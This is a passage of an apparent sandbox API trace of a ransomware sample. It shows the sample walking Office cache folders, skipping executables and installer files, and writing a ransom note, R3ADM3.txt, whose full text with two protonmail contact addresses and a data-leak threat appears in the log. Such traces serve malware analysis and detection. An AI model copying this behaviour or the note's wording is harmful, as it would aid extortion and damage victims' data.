cAlternateFileName="")) returned 0xecfb60 [0147.990] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0147.990] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf58ee8d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5d341910, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5d341910, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.990] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0147.990] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0147.990] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf5914a30, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x263400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OneNoteMUI.msi", cAlternateFileName="ONENOT~1.MSI")) returned 1 [0147.990] lstrcmpW (lpString1="OneNoteMUI.msi", lpString2=".") returned 1 [0147.990] lstrcmpW (lpString1="OneNoteMUI.msi", lpString2="..") returned 1 [0147.990] StrStrIW (lpFirst="OneNoteMUI.msi", lpSrch=".UAKXC") returned 0x0 [0147.990] StrStrIW (lpFirst="OneNoteMUI.msi", lpSrch=".exe") returned 0x0 [0147.990] StrStrIW (lpFirst="OneNoteMUI.msi", lpSrch=".dll") returned 0x0 [0147.990] StrStrIW (lpFirst="OneNoteMUI.msi", lpSrch=".lnk") returned 0x0 [0147.990] StrStrIW (lpFirst="OneNoteMUI.msi", lpSrch=".sys") returned 0x0 [0147.990] StrStrIW (lpFirst="OneNoteMUI.msi", lpSrch=".msi") returned=".msi" [0147.990] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf58ed930, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x646, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OneNoteMUI.xml", cAlternateFileName="ONENOT~1.XML")) returned 1 [0147.990] lstrcmpW (lpString1="OneNoteMUI.xml", lpString2=".") returned 1 [0147.990] lstrcmpW (lpString1="OneNoteMUI.xml", lpString2="..") returned 1 [0147.990] StrStrIW (lpFirst="OneNoteMUI.xml", lpSrch=".UAKXC") returned 0x0 [0147.990] StrStrIW (lpFirst="OneNoteMUI.xml", lpSrch=".exe") returned 0x0 [0147.990] StrStrIW (lpFirst="OneNoteMUI.xml", lpSrch=".dll") returned 0x0 [0147.990] StrStrIW (lpFirst="OneNoteMUI.xml", lpSrch=".lnk") returned 0x0 [0147.990] StrStrIW (lpFirst="OneNoteMUI.xml", lpSrch=".sys") returned 0x0 [0147.991] StrStrIW (lpFirst="OneNoteMUI.xml", lpSrch=".msi") returned 0x0 [0147.991] StrStrIW (lpFirst="OneNoteMUI.xml", lpSrch="R3ADM3.txt") returned 0x0 [0147.991] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6e48 [0147.991] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcff8 [0147.991] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd080 [0147.991] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xf811c0 [0147.991] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd080 | out: hHeap=0xea0000) returned 1 [0147.991] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcff8 | out: hHeap=0xea0000) returned 1 [0147.991] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6e48 | out: hHeap=0xea0000) returned 1 [0147.991] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef56c8 [0147.991] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6e48 [0147.991] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef6490 [0147.991] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef56c8 | out: hHeap=0xea0000) returned 1 [0147.991] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf811c0 | out: hHeap=0xea0000) returned 1 [0147.991] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x36db9d00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x36db9d00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf5e95540, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x10a5df8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OnoteLR.cab", cAlternateFileName="")) returned 1 [0147.991] lstrcmpW (lpString1="OnoteLR.cab", lpString2=".") returned 1 [0147.991] lstrcmpW (lpString1="OnoteLR.cab", lpString2="..") returned 1 [0147.991] StrStrIW (lpFirst="OnoteLR.cab", lpSrch=".UAKXC") returned 0x0 [0147.991] StrStrIW (lpFirst="OnoteLR.cab", lpSrch=".exe") returned 0x0 [0147.991] StrStrIW (lpFirst="OnoteLR.cab", lpSrch=".dll") returned 0x0 [0147.991] StrStrIW (lpFirst="OnoteLR.cab", lpSrch=".lnk") returned 0x0 [0147.991] StrStrIW (lpFirst="OnoteLR.cab", lpSrch=".sys") returned 0x0 [0147.991] StrStrIW (lpFirst="OnoteLR.cab", lpSrch=".msi") returned 0x0 [0147.992] StrStrIW (lpFirst="OnoteLR.cab", lpSrch="R3ADM3.txt") returned 0x0 [0147.992] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6d30 [0147.992] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcff8 [0147.992] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd080 [0147.992] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xf811c0 [0147.992] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd080 | out: hHeap=0xea0000) returned 1 [0147.992] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcff8 | out: hHeap=0xea0000) returned 1 [0147.992] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6d30 | out: hHeap=0xea0000) returned 1 [0147.992] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef56c8 [0147.992] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6d30 [0147.992] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef6538 [0147.992] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef56c8 | out: hHeap=0xea0000) returned 1 [0147.992] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf811c0 | out: hHeap=0xea0000) returned 1 [0147.992] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5d341910, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x5d341910, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5d38dbd0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0147.992] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0147.992] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0147.992] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0147.992] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0147.992] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0147.992] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0147.993] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0147.993] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0147.993] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0147.993] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf6e0d4a0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x7c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0147.993] lstrcmpW (lpString1="Setup.xml", lpString2=".") returned 1 [0147.993] lstrcmpW (lpString1="Setup.xml", lpString2="..") returned 1 [0147.993] StrStrIW (lpFirst="Setup.xml", lpSrch=".UAKXC") returned 0x0 [0147.993] StrStrIW (lpFirst="Setup.xml", lpSrch=".exe") returned 0x0 [0147.993] StrStrIW (lpFirst="Setup.xml", lpSrch=".dll") returned 0x0 [0147.993] StrStrIW (lpFirst="Setup.xml", lpSrch=".lnk") returned 0x0 [0147.993] StrStrIW (lpFirst="Setup.xml", lpSrch=".sys") returned 0x0 [0147.993] StrStrIW (lpFirst="Setup.xml", lpSrch=".msi") returned 0x0 [0147.993] StrStrIW (lpFirst="Setup.xml", lpSrch="R3ADM3.txt") returned 0x0 [0147.993] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6cb8 [0147.993] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcff8 [0147.993] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd080 [0147.993] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xf811c0 [0147.993] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd080 | out: hHeap=0xea0000) returned 1 [0147.993] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcff8 | out: hHeap=0xea0000) returned 1 [0147.993] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6cb8 | out: hHeap=0xea0000) returned 1 [0147.993] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef56c8 [0147.993] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6cb8 [0147.993] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef65e0 [0147.993] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef56c8 | out: hHeap=0xea0000) returned 1 [0147.994] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf811c0 | out: hHeap=0xea0000) returned 1 [0147.994] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf6e0d4a0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x7c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0147.994] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcd50 | out: hHeap=0xea0000) returned 1 [0147.994] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeadf8 | out: hHeap=0xea0000) returned 1 [0147.994] FindClose (in: hFindFile=0xecfb60 | out: hFindFile=0xecfb60) returned 1 [0147.994] Sleep (dwMilliseconds=0x32) [0148.077] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0148.077] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeddcb8 | out: hHeap=0xea0000) returned 1 [0148.077] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xeddcb8 [0148.077] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcd50 [0148.078] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeed4d8 [0148.078] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcd50 | out: hHeap=0xea0000) returned 1 [0148.078] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcd50 [0148.078] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef3050 [0148.078] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcff8 [0148.078] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd080 [0148.078] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xf811c0 [0148.078] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd080 | out: hHeap=0xea0000) returned 1 [0148.078] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcff8 | out: hHeap=0xea0000) returned 1 [0148.078] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef3050 | out: hHeap=0xea0000) returned 1 [0148.078] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\R3ADM3.txt" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6f0 [0148.235] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0148.235] WriteFile (in: hFile=0x6f0, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0148.236] CloseHandle (hObject=0x6f0) returned 1 [0148.236] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf811c0 | out: hHeap=0xea0000) returned 1 [0148.236] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcd50 | out: hHeap=0xea0000) returned 1 [0148.236] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5b30b20, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0x5d5ef1d0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5d5ef1d0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfb60 [0148.237] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0148.237] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5b30b20, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0x5d5ef1d0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5d5ef1d0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0148.237] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0148.237] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0148.237] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x308ae9f0, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0x308ae9f0, ftLastAccessTime.dwHighDateTime=0x1cbe56c, ftLastWriteTime.dwLowDateTime=0xa5b55ce0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x265400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProjectMUI.msi", cAlternateFileName="PROJEC~1.MSI")) returned 1 [0148.237] lstrcmpW (lpString1="ProjectMUI.msi", lpString2=".") returned 1 [0148.237] lstrcmpW (lpString1="ProjectMUI.msi", lpString2="..") returned 1 [0148.237] StrStrIW (lpFirst="ProjectMUI.msi", lpSrch=".UAKXC") returned 0x0 [0148.237] StrStrIW (lpFirst="ProjectMUI.msi", lpSrch=".exe") returned 0x0 [0148.237] StrStrIW (lpFirst="ProjectMUI.msi", lpSrch=".dll") returned 0x0 [0148.237] StrStrIW (lpFirst="ProjectMUI.msi", lpSrch=".lnk") returned 0x0 [0148.237] StrStrIW (lpFirst="ProjectMUI.msi", lpSrch=".sys") returned 0x0 [0148.237] StrStrIW (lpFirst="ProjectMUI.msi", lpSrch=".msi") returned=".msi" [0148.237] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x30a2b7b0, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0x30a2b7b0, ftLastAccessTime.dwHighDateTime=0x1cbe56c, ftLastWriteTime.dwLowDateTime=0xa5b2ebe0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x5ac, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProjectMUI.xml", cAlternateFileName="PROJEC~1.XML")) returned 1 [0148.237] lstrcmpW (lpString1="ProjectMUI.xml", lpString2=".") returned 1 [0148.237] lstrcmpW (lpString1="ProjectMUI.xml", lpString2="..") returned 1 [0148.237] StrStrIW (lpFirst="ProjectMUI.xml", lpSrch=".UAKXC") returned 0x0 [0148.237] StrStrIW (lpFirst="ProjectMUI.xml", lpSrch=".exe") returned 0x0 [0148.237] StrStrIW (lpFirst="ProjectMUI.xml", lpSrch=".dll") returned 0x0 [0148.237] StrStrIW (lpFirst="ProjectMUI.xml", lpSrch=".lnk") returned 0x0 [0148.237] StrStrIW (lpFirst="ProjectMUI.xml", lpSrch=".sys") returned 0x0 [0148.237] StrStrIW (lpFirst="ProjectMUI.xml", lpSrch=".msi") returned 0x0 [0148.238] StrStrIW (lpFirst="ProjectMUI.xml", lpSrch="R3ADM3.txt") returned 0x0 [0148.238] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6970 [0148.238] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcd50 [0148.238] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcff8 [0148.238] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xf811c0 [0148.238] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcff8 | out: hHeap=0xea0000) returned 1 [0148.238] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcd50 | out: hHeap=0xea0000) returned 1 [0148.238] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6970 | out: hHeap=0xea0000) returned 1 [0148.238] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef56c8 [0148.238] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6970 [0148.238] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef6688 [0148.238] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef56c8 | out: hHeap=0xea0000) returned 1 [0148.238] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf811c0 | out: hHeap=0xea0000) returned 1 [0148.238] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x30306de0, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0x30306de0, ftLastAccessTime.dwHighDateTime=0x1cbe56c, ftLastWriteTime.dwLowDateTime=0xa5b7cde0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x7e1dcd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProjLR.cab", cAlternateFileName="")) returned 1 [0148.238] lstrcmpW (lpString1="ProjLR.cab", lpString2=".") returned 1 [0148.238] lstrcmpW (lpString1="ProjLR.cab", lpString2="..") returned 1 [0148.238] StrStrIW (lpFirst="ProjLR.cab", lpSrch=".UAKXC") returned 0x0 [0148.238] StrStrIW (lpFirst="ProjLR.cab", lpSrch=".exe") returned 0x0 [0148.238] StrStrIW (lpFirst="ProjLR.cab", lpSrch=".dll") returned 0x0 [0148.238] StrStrIW (lpFirst="ProjLR.cab", lpSrch=".lnk") returned 0x0 [0148.239] StrStrIW (lpFirst="ProjLR.cab", lpSrch=".sys") returned 0x0 [0148.239] StrStrIW (lpFirst="ProjLR.cab", lpSrch=".msi") returned 0x0 [0148.239] StrStrIW (lpFirst="ProjLR.cab", lpSrch="R3ADM3.txt") returned 0x0 [0148.239] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6d58 [0148.239] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcd50 [0148.239] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcff8 [0148.239] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xf811c0 [0148.239] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcff8 | out: hHeap=0xea0000) returned 1 [0148.239] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcd50 | out: hHeap=0xea0000) returned 1 [0148.239] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6d58 | out: hHeap=0xea0000) returned 1 [0148.239] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef56c8 [0148.239] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6d58 [0148.239] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef6730 [0148.239] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef56c8 | out: hHeap=0xea0000) returned 1 [0148.239] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf811c0 | out: hHeap=0xea0000) returned 1 [0148.239] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5d5ef1d0, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x5d5ef1d0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5d5ef1d0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0148.239] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0148.239] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0148.239] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0148.239] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0148.239] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0148.239] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0148.239] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0148.240] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0148.240] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0148.240] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x309dfcc0, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0x309dfcc0, ftLastAccessTime.dwHighDateTime=0x1cbe56c, ftLastWriteTime.dwLowDateTime=0xa5bc88d0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x750, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0148.240] lstrcmpW (lpString1="Setup.xml", lpString2=".") returned 1 [0148.240] lstrcmpW (lpString1="Setup.xml", lpString2="..") returned 1 [0148.240] StrStrIW (lpFirst="Setup.xml", lpSrch=".UAKXC") returned 0x0 [0148.240] StrStrIW (lpFirst="Setup.xml", lpSrch=".exe") returned 0x0 [0148.240] StrStrIW (lpFirst="Setup.xml", lpSrch=".dll") returned 0x0 [0148.240] StrStrIW (lpFirst="Setup.xml", lpSrch=".lnk") returned 0x0 [0148.240] StrStrIW (lpFirst="Setup.xml", lpSrch=".sys") returned 0x0 [0148.240] StrStrIW (lpFirst="Setup.xml", lpSrch=".msi") returned 0x0 [0148.240] StrStrIW (lpFirst="Setup.xml", lpSrch="R3ADM3.txt") returned 0x0 [0148.240] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6da8 [0148.240] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcd50 [0148.240] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcff8 [0148.240] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xf811c0 [0148.240] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcff8 | out: hHeap=0xea0000) returned 1 [0148.240] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcd50 | out: hHeap=0xea0000) returned 1 [0148.240] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6da8 | out: hHeap=0xea0000) returned 1 [0148.240] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef56c8 [0148.240] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6da8 [0148.240] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef67d8 [0148.241] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef56c8 | out: hHeap=0xea0000) returned 1 [0148.241] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf811c0 | out: hHeap=0xea0000) returned 1 [0148.241] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x309dfcc0, 